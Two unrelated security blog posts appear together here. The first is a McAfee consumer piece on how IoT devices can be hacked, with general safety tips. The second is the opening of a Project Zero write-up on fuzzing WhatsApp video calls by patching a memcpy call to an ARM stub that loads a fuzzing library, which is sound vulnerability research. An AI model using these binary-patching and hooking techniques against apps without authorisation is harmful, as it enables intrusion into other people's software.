Digital health is set to dominate the consumer market in the next few years. Ranging from apps to hardware, the ways in which our health is being digitized varies, and so do the types of attacks that can be orchestrated. For example, on physical devices like pacemakers, malware can be implanted directly on to the device, enabling a hacker to control it remotely and inflict real harm to patients. When it comes to apps like pedometers, a hacker could source information like your physical location or regular routines.  Each of these far from benign scenarios highlight the importance of cybersecurity as the health market becomes increasingly reliant on technology and connectivity.

Smart Speakers

It seems like everyone nowadays has at least one smart speaker in their home. However, these speakers are always listening in, and if hacked, could be exploited by cybercriminals through spear phishing attacks. This can be done by spoofing actual websites which trick users into thinking that they are receiving a message from an official source. But once the user clicks on the email, they’ve just given a cybercriminal access to their home network, and by extension, all devices connected to that network too, smart speakers and all. To stay secure, start with protection on your router that extends to your network, change default passwords, and check for built-in security features.

Voice Assistants

Like smart speakers, voice assistants are always listening and, if hacked, could gain a wealth of information about you. But voice assistants are also often used as a central command hub, connecting other devices to them (including other smart speakers, smart lights or smart locks). Some people opt to connect accounts like food delivery, driver services, and shopping lists that use credit cards. If hacked, someone could gain access to your financial information or even access to your home. To keep cybercriminals out, consider a comprehensive security system, know which apps you can trust, and always keep your software up to date.

Connected Cars

Today, cars are essentially computers on wheels. Between backup cameras, video screens, GPS systems, and Wi-Fi networks, they have more electronics stacked in them than ever. The technology makes the experience smoother, but if it has a digital heartbeat, it’s hackable. In fact, an attacker can take control of your car a couple of ways; either by physically implanting a tiny device that grants access to your car through a phone, or by leveraging a black box tool and  your car’s diagnostic port completely remotely. Hacks can range anywhere from cranking the radio up to cutting the transmission or disabling the breaks. To stay secure, limit connectivity between your mobile devices and a car when possible, as phones are exposed to risks every day, and any time you connect it to your car, you put it at risk, too.

Smart Thermostats

A smart thermostat can regulate your home’s temperature and save you money by learning your preferences. But what if your friendly temperature regulator turned against you? If you don’t change your default, factory-set password and login information, a hacker could take control of your device and make it join a botnet

Connected Doorbells

When we think high-tech, the first thing that comes to mind is most likely not a doorbell. But connected doorbells are becoming more popular, especially as IoT devices are more widely adopted in our homes. So how can these devices be hacked, exactly? By sending an official-looking email that requests that a device owner download the doorbell’s app, the user unwittingly gave full access to the unwelcome guest. From there, the hackers could access call logs, the number of devices available, and even video files from past calls. Take heed from this hack; when setting up a new device, watch out for phishing emails and always make sure that an app is legitimate before you download it.

Smart Pet Cameras

We all love our furry friends and when we have to leave them behind as we head out the door. And it’s comforting to know that we can keep an eye on them, even give them the occasional treat through pet cameras. But this pet-nology can be hacked into by cybercriminals to see what’s get an inside look at your home, as proven by the “Hackable?” crew. Through a device’s app, a white-hat hacker was able to access the product’s database and was able to download photos and videos of other device owners. Talk about creepy. To keep prying eyes out of your private photos, get a comprehensive security solution for your home network and devices, avoid checking on your pet from unsecured Wi-Fi, and do your research on smart products you purchase for your pets.

Cell Phones

Mobile phones are one of the most vulnerable devices simply because they go everywhere you go. They essentially operate as a personal remote control to your digital life. In any given day, we access financial accounts, confirm doctor’s appointments and communicate with family and friends. That’s why is shocking to know how surprisingly easy it is for cybercriminals to access the treasure trove of personal data on your cell phone. Phones can be compromised a variety of ways; but here are a few: accessing your personal information by way of public Wi-Fi (say, while you’re at an airport), implanting a bug, leveraging a flaw in the operating system, or by infecting your device with malware by way of a bad link while surfing the web or browsing email.  Luckily, you can help secure your device by using comprehensive security such as McAfee Total Protection, or by leveraging a VPN (virtual private network) if you find yourself needing to use public Wi-Fi.

Virtual Reality Headsets

Once something out of a science fiction, virtual reality (VR) is now a high-tech reality for many. Surprisingly, despite being built on state of the art technology, VR is quite hackable. As an example, though common and easy-to-execute tactics like phishing to prompt someone to download malware, white-hat hackers were able to infect a linked computer and execute a command and control interface that manipulated the VR experience and disorientated the user. While this attack isn’t common yet, it could certainly start to gain traction as more VR headsets make their way into homes. To stay secure, be picky and only download software from reputable sources.

This is only the tip of the iceberg when it comes to hackable, everyday items. And while there’s absolutely no doubt that IoT devices certainly make life easier, what it all comes down to is control versus convenience. As we look toward 2019, we should ask ourselves, “what do we value more?”

Stay up-to-date on the latest trends by subscribing to our podcast, “Hackable?” and follow us on Twitter or Facebook.

The post 12 Days of Hack-mas appeared first on McAfee Blogs.

Adventures in Video Conferencing Part 3: The Even Wilder World of WhatsApp

Posted by Natalie Silvanovich, Project Zero

WhatsApp is another application that supports video conferencing that does not use WebRTC as its core implementation. Instead, it uses PJSIP, which contains some WebRTC code, but also contains a substantial amount of other code, and predates the WebRTC project. I fuzzed this implementation to see if it had similar results to WebRTC and FaceTime.

Fuzzing Set-up

PJSIP is open source, so it was easy to identify the PJSIP code in the Android WhatsApp binary ( Since PJSIP uses the open source library libsrtp, I started off by opening the binary in IDA and searching for the string srtp_protect, the name of the function libsrtp uses for encryption. This led to a log entry emitted by a function that looked like srtp_protect. There was only one function in the binary that called this function, and called memcpy soon before the call. Some log entries before the call contained the file name srtp_transport.c, which exists in the PJSIP repository. The log entries in the WhatsApp binary say that the function being called is transport_send_rtp2 and the PJSIP source only has a function called transport_send_rtp, but it looks similar to the function calling srtp_protect in WhatsApp, in that it has the same number of calls before and after the memcpy. Assuming that the code in WhatsApp is some variation of that code, the memcpy copies the entire unencrypted packet right before it is encrypted.

Hooking this memcpy seemed like a possible way to fuzz WhatsApp video calling. I started off by hooking memcpy for the entire app using a tool called Frida. This tool can easily hook native function in Android applications, and I was able to see calls to memcpy from WhatsApp within minutes. Unfortunately though, video conferencing is very performance sensitive, and a delay sending video packets actually influences the contents of the next packet, so hooking every memcpy call didn’t seem practical. Instead, I decided to change the single memcpy to point to a function I wrote.

I started off by writing a function in assembly that loaded a library from the filesystem using dlopen, retrieved a symbol by calling dlsym and then called into the library. Frida was very useful in debugging this, as it could hook calls to dlopen and dlsym to make sure they were being called correctly. I overwrote a function in the WhatsApp GIF transcoder with this function, as it is only used in sending text messages, which I didn’t plan to do with this altered version. I then set the memcpy call to point to this function instead of memcpy, using this online ARM branch finder.

MOV             X21, X30
MOV             X22, X0
MOV             X23, X1
MOV             X20, X2
MOV             X1, #1
ADRP            X0, #aDataDataCom_wh@PAGE ; "/data/data/com.whatsapp/"
ADD             X0, X0, #aDataDataCom_wh@PAGEOFF ; "/data/data/com.whatsapp/"
BL              .dlopen
ADRP            X1, #aApthread@PAGE ; "apthread"
ADD             X1, X1, #aApthread@PAGEOFF ; "apthread"
BL              .dlsym
MOV             X8, X0
MOV             X0, X22
MOV             X1, X23
MOV             X2, X20
BLR             X8
MOV             X30, X21
The library loading function

I then wrote a library for Android which had the same parameters as memcpy, but fuzzed and copied the buffer instead of just copying it, and put it on the filesystem where it would be loaded by dlopen. I then tried making a WhatsApp call with this setup. The video call looked like it was being fuzzed and crashed in roughly fifteen minutes.

Replay Set-up

To replay the packets I added logging to the library, so that each buffer that was altered would also be saved to a file. Then I created a second library that copied the logged packets into the buffer being copied instead of altering it. This required modifying the WhatsApp binary slightly, because the logged packet will usually not be the same size as the packet currently being sent. I changed the length of the hooked memcpy to be passed by reference instead of by value, and then had the library change the length to the length of the logged packet. This changed the value of the length so that it would be correct for the call to srtp_protect. Luckily, the buffer that the packet is copied into is a fixed length, so there is no concern that a valid packet will overflow the buffer length. This is a common design pattern in RTP processing that improves performance by reducing length checks. It was also helpful in modifying FaceTime to replay packets of varying length, as described